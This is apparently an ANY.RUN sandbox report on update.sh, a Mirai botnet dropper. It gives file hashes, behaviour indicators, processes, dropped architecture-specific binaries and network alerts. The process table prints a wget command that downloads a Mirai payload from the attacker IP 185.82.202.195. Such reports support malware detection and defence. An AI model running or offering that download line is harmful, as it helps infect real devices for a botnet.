File name:

update.sh

Full analysis: https://app.any.run/tasks/4c4b7860-1f4e-4314-a6c7-364193be4391
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: September 28, 2024, 14:34:16
OS: Ubuntu 22.04.2
Tags:
mirai
botnet
Indicators:
MIME: text/x-shellscript
File info: POSIX shell script, ASCII text executable
MD5:

11B5319F12983CB1C99EDC750D66724C

SHA1:

655B3E158548D7BBC89F38330490D97C554B2988

SHA256:

83494ED11FC33A848FD5C8D6FC92D92B9A5A4C712FC9ECFCDB84CEF6271EA0BF

SSDEEP:

24:1zFzT5zwztEgzNzJKu1DzizMIzGzhzu+zukzjz6ezJzTz+z0Kz4zfzRzvzYzCqoc:AU/+Zoj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 13921)

  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 13914)

    • Connects to the server without a host name

      • wget (PID: 13921)
      • busybox (PID: 13937)
      • wget (PID: 13942)
      • busybox (PID: 13943)
      • wget (PID: 13951)
      • busybox (PID: 13952)
      • busybox (PID: 13958)
      • wget (PID: 13957)
      • wget (PID: 13963)
      • busybox (PID: 13964)
      • wget (PID: 13969)
      • busybox (PID: 13970)
      • wget (PID: 13995)
      • busybox (PID: 13996)

    • Potential Corporate Privacy Violation

      • busybox (PID: 13937)
      • wget (PID: 13921)
      • busybox (PID: 13938)
      • wget (PID: 13942)
      • busybox (PID: 13943)
      • busybox (PID: 13944)
      • wget (PID: 13951)
      • busybox (PID: 13953)
      • busybox (PID: 13952)
      • wget (PID: 13957)
      • busybox (PID: 13958)
      • busybox (PID: 13959)
      • busybox (PID: 13965)
      • busybox (PID: 13971)
      • wget (PID: 13995)
      • busybox (PID: 13996)
      • wget (PID: 13963)
      • busybox (PID: 13964)
      • busybox (PID: 13997)

    • Executes the "rm" command to delete files or directories

      • update.sh (PID: 13919)

    • Uses wget to download content

      • update.sh (PID: 13919)

    • Executes commands using command-line interpreter

      • update-notifier (PID: 13972)

    • Reads /proc/mounts (likely used to find writable filesystems)

      • check-new-release-gtk (PID: 13974)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
279
Monitored processes
61
Malicious processes
11
Suspicious processes
11

Behavior graph

Click at the process to see the details
start sh no specs sudo no specs chown no specs chmod no specs sudo no specs update.sh no specs locale-check no specs #MIRAI wget systemctl no specs systemctl no specs systemctl no specs systemctl no specs systemctl no specs systemctl no specs busybox busybox chmod no specs dash no specs rm no specs wget busybox busybox chmod no specs dash no specs rm no specs wget busybox busybox chmod no specs dash no specs rm no specs wget busybox busybox chmod no specs dash no specs rm no specs wget busybox busybox chmod no specs dash no specs rm no specs wget busybox busybox update-notifier no specs sh no specs check-new-release-gtk dpkg no specs dpkg no specs lsb_release no specs lsb_release no specs lsb_release no specs lsb_release no specs chmod no specs dash no specs rm no specs wget busybox busybox

Process information

PID
CMD
Path
Indicators
Parent process
13913/bin/sh -c "sudo chown user /home/user/Desktop/update\.sh && chmod +x /home/user/Desktop/update\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/update\.sh "/bin/shany-guest-agent
User:
user
Integrity Level:
UNKNOWN
13914sudo chown user /home/user/Desktop/update.sh/usr/bin/sudosh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13916chown user /home/user/Desktop/update.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
13917chmod +x /home/user/Desktop/update.sh/usr/bin/chmodsh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13918sudo -iu user /home/user/Desktop/update.sh/usr/bin/sudosh
User:
user
Integrity Level:
UNKNOWN
13919/bin/sh /home/user/Desktop/update.sh/home/user/Desktop/update.shsudo
User:
user
Integrity Level:
UNKNOWN
13920/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkupdate.sh
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
13921wget http://185.82.202.195/roze.mips -O roze.mips/usr/bin/wget
update.sh
User:
user
Integrity Level:
UNKNOWN
Exit code:
1195
13925systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
482
13926systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service/usr/bin/systemctlsnapd
User:
root
Integrity Level:
UNKNOWN
Exit code:
482
Executable files
0
Suspicious files
7
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
13921wget/tmp/roze.mipsbinary
MD5:
SHA256:
13942wget/tmp/roze.mipselbinary
MD5:
SHA256:
13951wget/tmp/roze.sh4binary
MD5:
SHA256:
13952busybox/tmp/roze.sh4o
MD5:
SHA256:
13957wget/tmp/roze.x86binary
MD5:
SHA256:
13963wget/tmp/roze.armv6binary
MD5:
SHA256:
13964busybox/tmp/roze.armv6binary
MD5:
SHA256:
13974check-new-release-gtk/tmp/#6029335 (deleted)text
MD5:
SHA256:
13974check-new-release-gtk/tmp/#6029359 (deleted)text
MD5:
SHA256:
13974check-new-release-gtk/tmp/#6029364 (deleted)text
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
57
TCP/UDP connections
38
DNS requests
16
Threats
108

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
169.150.255.181:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
GET
204
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
185.125.190.97:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
185.125.190.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
13921
wget
GET
185.82.202.195:80
http://185.82.202.195/roze.mips
unknown
unknown
POST
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
whitelisted
GET
200
212.102.56.179:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.58 Mb
whitelisted
GET
200
195.181.175.40:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.58 Mb
whitelisted
GET
200
169.150.255.183:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.58 Mb
whitelisted
GET
200
185.125.188.59:443
https://api.snapcraft.io/v2/snaps/info/firefox?architecture=amd64&fields=architectures%2Cbase%2Cconfinement%2Clinks%2Ccontact%2Ccreated-at%2Cdescription%2Cdownload%2Cepoch%2Clicense%2Cname%2Cprices%2Cprivate%2Cpublisher%2Crevision%2Csnap-id%2Csummary%2Ctitle%2Ctype%2Cversion%2Cwebsite%2Cstore-url%2Cmedia%2Ccommon-ids%2Ccategories
unknown
tss
4.67 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.125.190.97:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
470
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
207.211.211.27:443
odrs.gnome.org
US
whitelisted
13921
wget
185.82.202.195:80
Host Sailor Ltd
NL
unknown
485
snapd
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
485
snapd
185.125.188.55:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
485
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
485
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
13937
busybox
185.82.202.195:80
Host Sailor Ltd
NL
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 185.125.190.97
  • 185.125.190.98
  • 185.125.190.96
  • 185.125.190.48
  • 91.189.91.98
  • 185.125.190.17
  • 91.189.91.96
  • 91.189.91.97
  • 91.189.91.49
  • 91.189.91.48
  • 185.125.190.18
  • 185.125.190.49
  • 2001:67c:1562::24
  • 2620:2d:4000:1::96
  • 2620:2d:4002:1::198
  • 2001:67c:1562::23
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::2a
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::98
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::2b
whitelisted
odrs.gnome.org
  • 207.211.211.27
  • 37.19.194.81
  • 195.181.170.19
  • 169.150.255.183
  • 212.102.56.179
  • 195.181.175.40
  • 169.150.255.181
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::19
whitelisted
google.com
  • 142.250.185.174
  • 2a00:1450:4001:82b::200e
whitelisted
api.snapcraft.io
  • 185.125.188.58
  • 185.125.188.55
  • 185.125.188.59
  • 185.125.188.54
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::6d
whitelisted
48.100.168.192.in-addr.arpa
unknown
changelogs.ubuntu.com
  • 185.125.190.18
  • 185.125.190.17
  • 91.189.91.48
  • 91.189.91.49
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::2a
whitelisted

Threats

PID
Process
Class
Message
13921
wget
A Network Trojan was detected
AV INFO Possible Mirai .mips Executable Download
13921
wget
Potentially Bad Traffic
ET INFO MIPS File Download Request from IP Address
13921
wget
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
13921
wget
Potentially Bad Traffic
ET INFO MIPS File Download Request from IP Address
13937
busybox
Potentially Bad Traffic
ET INFO MIPS File Download Request from IP Address
13937
busybox
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
13938
busybox
Potential Corporate Privacy Violation
ET TFTP Outbound TFTP Read Request
13938
busybox
Potential Corporate Privacy Violation
ET TFTP Outbound TFTP Read Request
13938
busybox
Potential Corporate Privacy Violation
ET TFTP Outbound TFTP Read Request
13938
busybox
Potential Corporate Privacy Violation
ET TFTP Outbound TFTP Read Request
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
update.sh